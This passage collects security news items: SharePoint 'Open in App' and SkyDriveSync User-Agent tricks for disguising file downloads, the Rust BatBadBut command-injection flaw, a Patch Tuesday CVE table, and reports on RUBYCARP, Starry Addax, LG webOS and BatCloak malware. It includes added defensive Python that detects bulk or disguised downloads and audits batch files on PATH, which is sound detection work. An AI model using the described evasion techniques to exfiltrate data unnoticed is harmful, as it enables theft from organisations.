The first approach takes advantage of SharePoint's "Open in App" feature to access and download files, whereas the second uses the User-Agent for Microsoft SkyDriveSync to download files or even entire sites while miscategorizing such events as file syncs instead of downloads.
Microsoft, which was made aware of the issues in November 2023, has yet to release a fix, although it has added them to its patch backlog program. In the interim, organizations are advised to closely monitor their audit logs for suspicious access events, specifically those that involve large volumes of file downloads within a short period.
"These techniques can bypass the detection and enforcement policies of traditional tools, such as cloud access security brokers, data loss prevention, and SIEMs, by hiding downloads as less suspicious access and sync events," Eric Saraga said.
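The two evasions above work because the Unified Audit Log still records the activity, just under operations that download-focused rules ignore: "Open in App" shows up as file access rather than download, and the SkyDriveSync User-Agent gets the event classified as a sync. A detection therefore has to count access and sync operations as retrievals and look at volume over time. The following is an added example, not Varonis' or Microsoft's code: the records are constructed to mimic Unified Audit Log fields (Operation, UserId, ClientIP, UserAgent, CreationTime, ObjectId), the User-Agent string is a placeholder in the SkyDriveSync shape, and the per-user baseline of known sync-client IPs is an assumption about what an organisation would already have.

```python
"""Flag bulk retrieval and unexpected sync clients in SharePoint audit records.

Added example. Real input would be the JSON returned by
Search-UnifiedAuditLog or the Office 365 Management Activity API; the
records below are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# All three operations hand the file content to the client, so all three
# count as downloads for volume purposes even though only one is labelled so.
RETRIEVAL_OPS = {"FileDownloaded", "FileAccessed", "FileSyncDownloadedFull"}

BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) constructed-browser/1.0"
SYNC_UA = "Microsoft SkyDriveSync 00.000.0000.0000 ship; Windows NT 10.0 (constructed)"


def _rec(t, op, user, ip, ua, obj):
    return {"CreationTime": t, "Operation": op, "UserId": user,
            "ClientIP": ip, "UserAgent": ua, "ObjectId": obj}


# Constructed sample: alice does normal work; bob opens 40 files in 40 seconds
# via "Open in App" (logged as FileAccessed) and later pulls an HR library
# with a sync-style User-Agent from a host that has never run the sync client.
SAMPLE_RECORDS = (
    [_rec(f"2024-04-10T09:0{i}:00", "FileAccessed", "alice@example.com", "203.0.113.5",
          BROWSER_UA, f"https://contoso.sharepoint.com/sites/finance/report{i}.docx")
     for i in range(3)]
    + [_rec(f"2024-04-10T14:05:{i:02d}", "FileAccessed", "bob@example.com", "198.51.100.7",
            BROWSER_UA, f"https://contoso.sharepoint.com/sites/finance/file{i}.pdf")
       for i in range(40)]
    + [_rec(f"2024-04-10T15:00:{i:02d}", "FileSyncDownloadedFull", "bob@example.com", "198.51.100.7",
            SYNC_UA, f"https://contoso.sharepoint.com/sites/hr/doc{i}.docx")
       for i in range(5)]
    + [_rec("2024-04-10T16:00:00", "FileSyncDownloadedFull", "alice@example.com", "203.0.113.5",
            SYNC_UA, "https://contoso.sharepoint.com/sites/finance/Q1.xlsx")]
)

# Constructed baseline: IPs from which each user's OneDrive client has been seen.
KNOWN_SYNC_CLIENTS = {"alice@example.com": {"203.0.113.5"}}


def bulk_retrieval(records, threshold=25, window=timedelta(minutes=5)):
    """Return {user: peak count} for users exceeding `threshold` retrievals in any `window`."""
    by_user = defaultdict(list)
    for r in records:
        if r["Operation"] in RETRIEVAL_OPS:
            by_user[r["UserId"]].append(datetime.fromisoformat(r["CreationTime"]))
    flagged = {}
    for user, times in by_user.items():
        times.sort()
        recent = deque()  # sliding window of timestamps within `window` of the newest
        peak = 0
        for t in times:
            recent.append(t)
            while t - recent[0] > window:
                recent.popleft()
            peak = max(peak, len(recent))
        if peak > threshold:
            flagged[user] = peak
    return flagged


def unexpected_sync_clients(records, known_clients):
    """Sync-classified downloads carrying a SkyDriveSync UA from an IP not in the user's baseline."""
    hits = []
    for r in records:
        if r["Operation"] == "FileSyncDownloadedFull" and "SkyDriveSync" in r["UserAgent"]:
            if r["ClientIP"] not in known_clients.get(r["UserId"], set()):
                hits.append((r["UserId"], r["ClientIP"], r["ObjectId"]))
    return hits


if __name__ == "__main__":
    print("bulk retrieval:", bulk_retrieval(SAMPLE_RECORDS))
    for hit in unexpected_sync_clients(SAMPLE_RECORDS, KNOWN_SYNC_CLIENTS):
        print("unexpected sync client:", hit)
```

Tune `threshold` and `window` to the tenant's normal traffic before alerting on them; the point of the example is that the volume rule must include FileAccessed and FileSyncDownloadedFull, because a rule keyed on FileDownloaded alone is exactly what these two techniques slip past.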
Critical 'BatBadBut' Rust Vulnerability Exposes Windows Systems to Attacks
10.4.24
Exploit
The Hacker News
A critical security flaw in the Rust standard library could be exploited to
target Windows users and stage command injection attacks.
The vulnerability, tracked as CVE-2024-24576, has a CVSS score of 10.0, indicating maximum severity. That said, it only impacts scenarios where batch files are invoked on Windows with untrusted arguments.
"The Rust standard library did not properly escape arguments when invoking batch files (with the bat and cmd extensions) on Windows using the Command API," the Rust Security Response working group said in an advisory released on April 9, 2024.
"An attacker able to control the arguments passed to the spawned process could execute arbitrary shell commands by bypassing the escaping."
The flaw impacts all versions of Rust before 1.77.2. Security researcher RyotaK has been credited with discovering and reporting the bug to the CERT Coordination Center (CERT/CC).
RyotaK said the vulnerability – codenamed BatBadBut – impacts several programming languages and that it arises when the "programming language wraps the CreateProcess function [in Windows] and adds the escaping mechanism for the command arguments."
But given that not every programming language has addressed the problem,
developers are advised to exercise caution when executing commands on Windows.
"To prevent the unexpected execution of batch files, you should consider moving the batch files to a directory that is not included in the PATH environment variable," RyotaK said in a word of advice to users.
"In this case, the batch files won't be executed unless the full path is specified, so the unexpected execution of batch files can be prevented."
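The advice above rests on how Windows resolves a bare command name: CreateProcess searches the PATH directories and will happily pick up `name.bat` or `name.cmd`, which is what routes the arguments through cmd.exe's escaping rules in the first place. An inventory of which batch files are currently reachable that way is the natural first step before moving them. The following is an added example and not RyotaK's or the Rust project's code; the directory layout it builds is constructed so the function can be exercised anywhere, while `os.environ["PATH"]` would be the real input.

```python
"""List batch files that can be launched by bare name from PATH (added example)."""
import os
import tempfile
from pathlib import Path

BATCH_SUFFIXES = {".bat", ".cmd"}


def batch_files_on_path(path_dirs):
    """Map each bare command name to the batch files that resolve to it.

    A name that maps to several files is worth noting too: the first PATH
    entry wins, so the file that actually runs depends on directory order.
    """
    found = {}
    for d in path_dirs:
        p = Path(d)
        if not p.is_dir():
            continue  # PATH routinely contains stale or empty entries
        for entry in p.iterdir():
            if entry.is_file() and entry.suffix.lower() in BATCH_SUFFIXES:
                found.setdefault(entry.stem.lower(), []).append(str(entry))
    return found


def audit_path(path_value=None):
    """Audit a PATH string (default: the current process environment)."""
    if path_value is None:
        path_value = os.environ.get("PATH", "")
    return batch_files_on_path(path_value.split(os.pathsep))


def demo():
    """Constructed PATH: two directories, a shadowed batch name, one non-batch file."""
    with tempfile.TemporaryDirectory() as tmp:
        tools = Path(tmp, "tools")
        scripts = Path(tmp, "scripts")
        tools.mkdir()
        scripts.mkdir()
        (tools / "build.bat").write_text("@echo off\r\necho build\r\n")
        (scripts / "build.cmd").write_text("@echo off\r\necho other build\r\n")
        (tools / "helper.exe").write_bytes(b"")
        result = audit_path(os.pathsep.join([str(tools), str(scripts)]))
        return {name: len(paths) for name, paths in result.items()}


if __name__ == "__main__":
    for name, paths in audit_path().items():
        print(f"{name}: {', '.join(paths)}")
```

Anything this reports is a batch file that a `Command`-style API could be made to run by name; once such files are moved to a directory outside PATH and invoked by full path, as RyotaK suggests, the list should come back empty.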
This update covers a total of 157 vulnerabilities. Seven of these vulnerabilities are Chromium vulnerabilities affecting Microsoft's Edge browser. However, only three of these vulnerabilities are considered critical. One of the vulnerabilities had already been disclosed and exploited.
Vulnerabilities of Interest:
CVE-2024-26234: This proxy driver spoofing vulnerability has already been exploited and made public before today.
CVE-2024-21322, CVE-2024-21323, CVE-2024-29053: These critical vulnerabilities allow remote code execution in Microsoft Defender for IoT.
The update patches about 40 (sorry, lost exact count) remote code execution vulnerabilities in Microsoft OLE DB Driver for SQL Server. These vulnerabilities are rated only "important", not "critical". They affect clients connecting to malicious SQL servers: the client would be the target, not the server.
The seven important remote code execution vulnerabilities in the DNS Server Service look interesting. To achieve remote code execution, "perfect timing" is required according to Microsoft.
Description / CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG) |
---|---|---|---|---|---|---|---|
Mariner: Openwsman Path Traversal and process_connection() DoS vulnerability. | |||||||
CVE-2019-3816 | No | No | - | - | - | 7.5 | 7.5 |
CVE-2019-3833 | No | No | - | - | - | 7.5 | 7.5 |
.NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability | |||||||
CVE-2024-21409 | No | No | - | - | Important | 7.3 | 6.4 |
Azure AI Search Information Disclosure Vulnerability | |||||||
CVE-2024-29063 | No | No | - | - | Important | 7.3 | 6.6 |
Azure Arc-enabled Kubernetes Extension Cluster-Scope Elevation of Privilege Vulnerability | |||||||
CVE-2024-28917 | No | No | - | - | Important | 6.2 | 5.4 |
Azure Compute Gallery Elevation of Privilege Vulnerability | |||||||
CVE-2024-21424 | No | No | - | - | Important | 6.5 | 5.7 |
Azure CycleCloud Elevation of Privilege Vulnerability | |||||||
CVE-2024-29993 | No | No | - | - | Important | 8.8 | 7.7 |
Azure Identity Library for .NET Information Disclosure Vulnerability | |||||||
CVE-2024-29992 | No | No | - | - | Moderate | 5.5 | 5.3 |
Azure Migrate Remote Code Execution Vulnerability | |||||||
CVE-2024-26193 | No | No | - | - | Important | 6.4 | 5.9 |
Azure Monitor Agent Elevation of Privilege Vulnerability | |||||||
CVE-2024-29989 | No | No | - | - | Important | 8.4 | 7.3 |
Azure Private 5G Core Denial of Service Vulnerability | |||||||
CVE-2024-20685 | No | No | - | - | Moderate | 5.9 | 5.2 |
BitLocker Security Feature Bypass Vulnerability | |||||||
CVE-2024-20665 | No | No | - | - | Important | 6.1 | 5.3 |
Chromium: CVE-2024-3156 Inappropriate implementation in V8 | |||||||
CVE-2024-3156 | No | No | - | - | - | ||
Chromium: CVE-2024-3158 Use after free in Bookmarks | |||||||
CVE-2024-3158 | No | No | - | - | - | ||
Chromium: CVE-2024-3159 Out of bounds memory access in V8 | |||||||
CVE-2024-3159 | No | No | - | - | - | ||
DHCP Server Service Denial of Service Vulnerability | |||||||
CVE-2024-26212 | No | No | - | - | Important | 7.5 | 6.5 |
CVE-2024-26215 | No | No | - | - | Important | 7.5 | 7.2 |
DHCP Server Service Remote Code Execution Vulnerability | |||||||
CVE-2024-26195 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-26202 | No | No | - | - | Important | 7.2 | 6.3 |
HTTP.sys Denial of Service Vulnerability | |||||||
CVE-2024-26219 | No | No | - | - | Important | 7.5 | 6.5 |
Intel: CVE-2024-2201 Branch History Injection | |||||||
CVE-2024-2201 | No | No | - | - | Important | 4.7 | 4.1 |
Lenovo: CVE-2024-23593 Zero Out Boot Manager and drop to UEFI Shell | |||||||
CVE-2024-23593 | No | No | - | - | Important | 7.8 | 6.8 |
Lenovo: CVE-2024-23594 Stack Buffer Overflow in LenovoBT.efi | |||||||
CVE-2024-23594 | No | No | - | - | Important | 6.4 | 5.6 |
Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability | |||||||
CVE-2024-29990 | No | No | - | - | Important | 9.0 | 8.1 |
Microsoft Brokering File System Elevation of Privilege Vulnerability | |||||||
CVE-2024-28905 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-26213 | No | No | - | - | Important | 7.0 | 6.1 |
CVE-2024-28904 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-28907 | No | No | - | - | Important | 7.8 | 6.8 |
Microsoft Defender for IoT Elevation of Privilege Vulnerability | |||||||
CVE-2024-21324 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-29055 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-29054 | No | No | - | - | Important | 7.2 | 6.3 |
Microsoft Defender for IoT Remote Code Execution Vulnerability | |||||||
CVE-2024-21322 | No | No | - | - | Critical | 7.2 | 6.3 |
CVE-2024-21323 | No | No | - | - | Critical | 8.8 | 7.7 |
CVE-2024-29053 | No | No | - | - | Critical | 8.8 | 7.7 |
Microsoft Edge (Chromium-based) Spoofing Vulnerability | |||||||
CVE-2024-29981 | No | No | Less Likely | Less Likely | Low | 4.3 | 3.9 |
Microsoft Edge (Chromium-based) Webview2 Spoofing Vulnerability | |||||||
CVE-2024-29049 | No | No | Less Likely | Less Likely | Moderate | 4.1 | 3.6 |
Microsoft Excel Remote Code Execution Vulnerability | |||||||
CVE-2024-26257 | No | No | - | - | Important | 7.8 | 7.5 |
Microsoft Install Service Elevation of Privilege Vulnerability | |||||||
CVE-2024-26158 | No | No | - | - | Important | 7.8 | 6.8 |
Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability | |||||||
CVE-2024-26209 | No | No | - | - | Important | 5.5 | 4.8 |
Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability | |||||||
CVE-2024-26232 | No | No | - | - | Important | 7.3 | 6.4 |
CVE-2024-26208 | No | No | - | - | Important | 7.2 | 6.3 |
Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability | |||||||
CVE-2024-28929 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28931 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28932 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28936 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29043 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28930 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28933 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28934 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28935 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28937 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28938 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28941 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28943 | No | No | - | - | Important | 8.8 | 7.7 |
Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability | |||||||
CVE-2024-28906 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28908 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28909 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28910 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28911 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28912 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28913 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28914 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28915 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28939 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28942 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28945 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29045 | No | No | - | - | Important | 7.5 | 6.5 |
CVE-2024-29047 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28926 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28927 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28940 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-28944 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29044 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29046 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29048 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29982 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29983 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29984 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-29985 | No | No | - | - | Important | 8.8 | 7.7 |
Microsoft SharePoint Server Spoofing Vulnerability | |||||||
CVE-2024-26251 | No | No | - | - | Important | 6.8 | 6.5 |
Microsoft Virtual Machine Bus (VMBus) Denial of Service Vulnerability | |||||||
CVE-2024-26254 | No | No | - | - | Important | 7.5 | 6.5 |
Microsoft WDAC OLE DB Provider for SQL Server Remote Code Execution Vulnerability | |||||||
CVE-2024-26210 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-26244 | No | No | - | - | Important | 8.8 | 7.7 |
Microsoft WDAC SQL Server ODBC Driver Remote Code Execution Vulnerability | |||||||
CVE-2024-26214 | No | No | - | - | Important | 8.8 | 7.7 |
Outlook for Windows Spoofing Vulnerability | |||||||
CVE-2024-20670 | No | No | - | - | Important | 8.1 | 7.1 |
Proxy Driver Spoofing Vulnerability | |||||||
CVE-2024-26234 | Yes | Yes | - | - | Important | 6.7 | 5.8 |
Remote Procedure Call Runtime Remote Code Execution Vulnerability | |||||||
CVE-2024-20678 | No | No | - | - | Important | 8.8 | 7.7 |
Secure Boot Security Feature Bypass Vulnerability | |||||||
CVE-2024-20669 | No | No | - | - | Important | 6.7 | 5.8 |
CVE-2024-20688 | No | No | - | - | Important | 7.1 | 6.2 |
CVE-2024-20689 | No | No | - | - | Important | 7.1 | 6.2 |
CVE-2024-26250 | No | No | - | - | Important | 6.7 | 5.8 |
CVE-2024-28920 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-28922 | No | No | - | - | Important | 4.1 | 3.6 |
CVE-2024-28921 | No | No | - | - | Important | 6.7 | 5.8 |
CVE-2024-28919 | No | No | - | - | Important | 6.7 | 5.8 |
CVE-2024-28923 | No | No | - | - | Important | 6.4 | 5.6 |
CVE-2024-28896 | No | No | - | - | Important | 7.5 | 6.5 |
CVE-2024-28898 | No | No | - | - | Important | 6.3 | 5.5 |
CVE-2024-28903 | No | No | - | - | Important | 6.7 | 5.8 |
CVE-2024-26168 | No | No | - | - | Important | 6.8 | 5.9 |
CVE-2024-26171 | No | No | - | - | Important | 6.7 | 5.8 |
CVE-2024-26175 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-26180 | No | No | - | - | Important | 8.0 | 7.0 |
CVE-2024-26189 | No | No | - | - | Important | 8.0 | 7.0 |
CVE-2024-26194 | No | No | - | - | Important | 7.4 | 6.4 |
CVE-2024-26240 | No | No | - | - | Important | 8.0 | 7.0 |
CVE-2024-28924 | No | No | - | - | Important | 6.7 | 5.8 |
CVE-2024-28925 | No | No | - | - | Important | 8.0 | 7.0 |
CVE-2024-28897 | No | No | - | - | Important | 6.8 | 5.9 |
CVE-2024-29061 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-29062 | No | No | - | - | Important | 7.1 | 6.2 |
SmartScreen Prompt Security Feature Bypass Vulnerability | |||||||
CVE-2024-29988 | No | No | - | - | Important | 8.8 | 8.2 |
Win32k Elevation of Privilege Vulnerability | |||||||
CVE-2024-26241 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Authentication Elevation of Privilege Vulnerability | |||||||
CVE-2024-21447 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-29056 | No | No | - | - | Important | 4.3 | 3.8 |
Windows CSC Service Elevation of Privilege Vulnerability | |||||||
CVE-2024-26229 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Cryptographic Services Remote Code Execution Vulnerability | |||||||
CVE-2024-29050 | No | No | - | - | Important | 8.4 | 7.3 |
Windows Cryptographic Services Security Feature Bypass Vulnerability | |||||||
CVE-2024-26228 | No | No | - | - | Important | 7.8 | 6.8 |
Windows DNS Server Remote Code Execution Vulnerability | |||||||
CVE-2024-26221 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-26222 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-26223 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-26224 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-26227 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-26231 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-26233 | No | No | - | - | Important | 7.2 | 6.3 |
Windows DWM Core Library Information Disclosure Vulnerability | |||||||
CVE-2024-26172 | No | No | - | - | Important | 5.5 | 4.8 |
Windows Defender Credential Guard Elevation of Privilege Vulnerability | |||||||
CVE-2024-26237 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Distributed File System (DFS) Information Disclosure Vulnerability | |||||||
CVE-2024-26226 | No | No | - | - | Important | 6.5 | 5.7 |
Windows Distributed File System (DFS) Remote Code Execution Vulnerability | |||||||
CVE-2024-29066 | No | No | - | - | Important | 7.2 | 6.3 |
Windows File Server Resource Management Service Elevation of Privilege Vulnerability | |||||||
CVE-2024-26216 | No | No | - | - | Important | 7.3 | 6.4 |
Windows Hyper-V Denial of Service Vulnerability | |||||||
CVE-2024-29064 | No | No | - | - | Important | 6.2 | 5.4 |
Windows Kerberos Denial of Service Vulnerability | |||||||
CVE-2024-26183 | No | No | - | - | Important | 6.5 | 5.7 |
Windows Kerberos Elevation of Privilege Vulnerability | |||||||
CVE-2024-26248 | No | No | - | - | Important | 7.5 | 6.5 |
Windows Kernel Elevation of Privilege Vulnerability | |||||||
CVE-2024-20693 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-26218 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Mobile Hotspot Information Disclosure Vulnerability | |||||||
CVE-2024-26220 | No | No | - | - | Important | 5.0 | 4.4 |
Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | |||||||
CVE-2024-26211 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Remote Access Connection Manager Information Disclosure Vulnerability | |||||||
CVE-2024-26255 | No | No | - | - | Important | 5.5 | 4.8 |
CVE-2024-28901 | No | No | - | - | Important | 5.5 | 4.8 |
CVE-2024-28902 | No | No | - | - | Important | 5.5 | 4.8 |
CVE-2024-26207 | No | No | - | - | Important | 5.5 | 4.8 |
CVE-2024-26217 | No | No | - | - | Important | 5.5 | 4.8 |
CVE-2024-28900 | No | No | - | - | Important | 5.5 | 4.8 |
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | |||||||
CVE-2024-26179 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-26200 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-26205 | No | No | - | - | Important | 8.8 | 7.7 |
Windows SMB Elevation of Privilege Vulnerability | |||||||
CVE-2024-26245 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Storage Elevation of Privilege Vulnerability | |||||||
CVE-2024-29052 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Telephony Server Elevation of Privilege Vulnerability | |||||||
CVE-2024-26242 | No | No | - | - | Important | 7.0 | 6.1 |
CVE-2024-26230 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-26239 | No | No | - | - | Important | 7.8 | 6.8 |
Windows USB Print Driver Elevation of Privilege Vulnerability | |||||||
CVE-2024-26243 | No | No | - | - | Important | 7.0 | 6.1 |
Windows Update Stack Elevation of Privilege Vulnerability | |||||||
CVE-2024-26235 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-26236 | No | No | - | - | Important | 7.0 | 6.1 |
Windows rndismp6.sys Remote Code Execution Vulnerability | |||||||
CVE-2024-26252 | No | No | - | - | Important | 6.8 | 5.9 |
CVE-2024-26253 | No | No | - | - | Important | 6.8 | 5.9 |
libarchive Remote Code Execution Vulnerability | |||||||
CVE-2024-26256 | No | No | - | - | Important | 7.8 | 6.8 |
10-Year-Old 'RUBYCARP' Romanian Hacker Group Surfaces with Botnet
9.4.24
BotNet
The Hacker News
A threat group of suspected Romanian origin called RUBYCARP has been observed maintaining a long-running botnet for carrying out crypto mining, distributed denial-of-service (DDoS), and phishing attacks.
The group, believed to be active for at least 10 years, employs the botnet for financial gain, Sysdig said in a report shared with The Hacker News.
"Its primary method of operation leverages a botnet deployed using a variety of public exploits and brute-force attacks," the cloud security firm said. "This group communicates via public and private IRC networks."
Evidence gathered so far suggests that RUBYCARP may have crossover with another threat cluster tracked by Albanian cybersecurity firm Alphatechs under the moniker Outlaw, which has a history of conducting crypto mining and brute-force attacks and has since pivoted to phishing and spear-phishing campaigns to cast a wide net.
"These phishing emails often lure victims into revealing sensitive information, such as login credentials or financial details," security researcher Brenton Isufi said in a report published in late December 2023.
A notable aspect of RUBYCARP's tradecraft is the use of a malware called ShellBot (aka PerlBot) to breach target environments. It has also been observed exploiting security flaws in the Laravel Framework (e.g., CVE-2021-3129), a technique also adopted by other threat actors like AndroxGh0st.
In a sign that the attackers are expanding their arsenal of initial access methods to expand the scale of the botnet, Sysdig said it discovered signs of WordPress sites being compromised using commonly used usernames and passwords.
"Once access is obtained, a backdoor is installed based on the popular Perl ShellBot," the company said. "The victim's server is then connected to an [Internet Relay Chat] server acting as command-and-control, and joins the larger botnet."
The botnet is estimated to comprise over 600 hosts, with the IRC server ("chat.juicessh[.]pro") created on May 1, 2023. It heavily relies on IRC for general communications as well as for managing its botnets and coordinating crypto mining campaigns.
Furthermore, members of the group – named juice_, Eugen, Catalin, MUIE, and Smecher, among others – have been found to communicate via an Undernet IRC channel called #cristi. Also put to use is a mass scanner tool to find new potential hosts.
RUBYCARP's arrival on the cyber threat scene is not surprising given their ability to take advantage of the botnet to fuel diverse illicit income streams such as crypto mining and phishing operations to steal credit card numbers.
While it appears that the stolen credit card data is used to purchase attack infrastructure, there is also the possibility that the information could be monetized through other means by selling it in the cyber crime underground.
"These threat actors are also involved in the development and sale of cyber weapons, which isn't very common," Sysdig said. "They have a large arsenal of tools they have built up over the years, which gives them quite a range of flexibility when conducting their operations."
Hackers Targeting Human Rights Activists in Morocco and Western Sahara
9.4.24
Phishing
The Hacker News
Human rights activists in Morocco and the Western Sahara region are the targets of a new threat actor that leverages phishing attacks to trick victims into installing bogus Android apps and serve credential harvesting pages for Windows users.
Cisco Talos is tracking the activity cluster under the name Starry Addax, describing it as primarily singling out activists associated with the Sahrawi Arab Democratic Republic (SADR).
Starry Addax's infrastructure – ondroid[.]site and ondroid[.]store – is designed to target both Android and Windows users, with the latter involving fake websites masquerading as login pages for popular social media websites.
The adversary, believed to be active since January 2024, is known to send spear-phishing emails to targets, urging recipients to install Sahara Press Service's mobile app or a relevant decoy related to the region.
Depending on the operating system the request originates from, the target is either served a malicious APK that impersonates the Sahara Press Service or redirected to a social media login page to harvest their credentials.
The novel Android malware, dubbed FlexStarling, is versatile and equipped to deliver additional malware components and steal sensitive information from infected devices.
Once installed, it requests the victim to grant it extensive permissions that allow the malware to perform nefarious actions, including fetching commands to be executed from a Firebase-based command-and-control (C2), a sign that the threat actor is looking to fly under the radar.
"Campaigns like this that target high-value individuals usually intend to sit quietly on the device for an extended period," Talos said.
"All components from the malware to the operating infrastructure seem to be bespoke/custom-made for this specific campaign indicating a heavy focus on stealth and conducting activities under the radar."
The development comes amid the emergence of a new commercial Android remote access trojan (RAT) known as Oxycorat that's being offered for sale with diverse information gathering capabilities.
Researchers Discover LG Smart TV Vulnerabilities Allowing Root Access
9.4.24
Vulnerability
The Hacker News
Multiple security vulnerabilities have been disclosed in LG webOS running on its smart televisions that could be exploited to bypass authorization and gain root access on the devices.
The findings come from Romanian cybersecurity firm Bitdefender, which discovered and reported the flaws in November 2023. The issues were fixed by LG as part of updates released on March 22, 2024.
The vulnerabilities are tracked from CVE-2023-6317 through CVE-2023-6320 and impact the following versions of webOS -
webOS 4.9.7 - 5.30.40 running on LG43UM7000PLA
webOS 5.5.0 - 04.50.51 running on OLED55CXPUA
webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB
webOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA
A brief description of the shortcomings is as follows -
CVE-2023-6317 - A vulnerability that allows an attacker to bypass PIN verification and add a privileged user profile to the TV set without requiring user interaction
CVE-2023-6318 - A vulnerability that allows the attacker to elevate their privileges and gain root access to take control of the device
CVE-2023-6319 - A vulnerability that allows operating system command injection by manipulating a library named asm responsible for showing music lyrics
CVE-2023-6320 - A vulnerability that allows for the injection of authenticated commands by manipulating the com.webos.service.connectionmanager/tv/setVlanStaticAddress API endpoint
Successful exploitation of the flaws could allow a threat actor to gain elevated permissions to the device, which, in turn, can be chained with CVE-2023-6318 and CVE-2023-6319 to obtain root access, or with CVE-2023-6320 to run arbitrary commands as the dbus user.
"Although the vulnerable service is intended for LAN access only, Shodan, the search engine for Internet-connected devices, identified over 91,000 devices that expose this service to the Internet," Bitdefender said. A majority of the devices are located in South Korea, Hong Kong, the U.S., Sweden, Finland, and Latvia.
Attackers Using Obfuscation Tools to Deliver Multi-Stage Malware via Invoice Phishing
9.4.24
Virus
The Hacker News
Cybersecurity researchers have discovered an intricate multi-stage attack that leverages invoice-themed phishing decoys to deliver a wide range of malware such as Venom RAT, Remcos RAT, XWorm, NanoCore RAT, and a stealer that targets crypto wallets.
The email messages come with Scalable Vector Graphics (SVG) file attachments that, when clicked, activate the infection sequence, Fortinet FortiGuard Labs said in a technical report.
The modus operandi is notable for the use of the BatCloak malware obfuscation engine and ScrubCrypt to deliver the malware in the form of obfuscated batch scripts.
BatCloak, offered for sale to other threat actors since late 2022, has its foundations in another tool called Jlaive. Its primary feature is to load a next-stage payload in a manner that circumvents traditional detection mechanisms.
ScrubCrypt, a crypter that was first documented by Fortinet in March 2023 in connection with a cryptojacking campaign orchestrated by the 8220 Gang, is assessed to be one of the iterations of BatCloak, according to research from Trend Micro last year.
In the latest campaign analyzed by the cybersecurity firm, the SVG file serves as a conduit to drop a ZIP archive that contains a batch script likely created using BatCloak, which then unpacks the ScrubCrypt batch file to ultimately execute Venom RAT, but not before setting up persistence on the host and taking steps to bypass AMSI and ETW protections.
A fork of Quasar RAT, Venom RAT allows attackers to seize control of the compromised systems, gather sensitive information, and execute commands received from a command-and-control (C2) server.
